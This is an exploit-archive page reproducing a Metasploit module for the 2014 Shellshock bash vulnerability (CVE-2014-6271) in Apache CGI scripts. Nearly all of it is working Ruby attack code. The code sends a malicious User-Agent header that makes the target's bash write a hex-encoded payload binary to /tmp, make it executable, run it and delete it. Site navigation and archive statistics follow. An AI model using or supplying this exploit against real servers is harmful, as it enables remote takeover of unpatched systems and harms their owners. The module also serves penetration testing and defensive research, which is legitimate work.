Shellshock Bashed CGI RCE

Shellshock Bashed CGI RCE: Posted Oct 3, 2014; Authored by Fady Mohamed Osman, Stephane Chazelas | Site metasploit.com; This Metasploit module exploits the shellshock vulnerability in apache cgi. It allows you to execute any metasploit payload you want.; tags | exploit, cgi; advisories | CVE-2014-6271; SHA-256 | a864c843ce6ef903a561a68316c0959dd2b138cad93a26d0f8f6d85e6d98db5d; Download | Favorite | View

Shellshock Bashed CGI RCE

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Shellshock Bashed CGI RCE',
      'Description'    => %q{
          This module exploits the shellshock vulnerability in apache cgi. It allows you to
        excute any metasploit payload you want.
      },
      'Author'         =>
        [
            'Stephane Chazelas',  # vuln discovery
            'Fady Mohamed Osman'  # Metasploit module f.othman at zinad.net
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2014-6271' ]
        ],
      'Payload'       =>
        {
          'BadChars' => "",
        },
        'Platform' => 'linux',
        'Arch'         => ARCH_X86,
        'Targets'        =>
        [
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
        'DefaultTarget'  => 0,
        'DisclosureDate' => 'Aug 13 2014'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The CGI url', '/cgi-bin/test.sh']) ,
        OptString.new('FILEPATH', [true, 'The url ', '/tmp'])
      ], self.class)
  end

  def exploit
    @payload_name = "#{rand_text_alpha(5)}"
    full_path = datastore['FILEPATH'] + '/' + @payload_name
    payload_exe = generate_payload_exe
    if payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to generate the ELF, select a native payload")
    end
    peer = "#{rhost}:#{rport}"
    print_status("#{peer} - Creating payload #{full_path}")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => datastore['TARGETURI'],
      'agent'    => "() { :;}; /bin/bash -c \"" + "printf " + "\'" + Rex::Text.hexify(payload_exe).gsub("\n",'') + "\'" +  "> #{full_path}; chmod +x #{full_path};#{full_path};rm #{full_path};\""
    })
  end
end

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 62 files
Debian 23 files
LiquidWorm 20 files
Apple 9 files
indoushka 5 files
Gentoo 5 files
Google Security Research 4 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Shellshock Bashed CGI RCE

Shellshock Bashed CGI RCE

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Shellshock Bashed CGI RCE

Share This

Shellshock Bashed CGI RCE

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems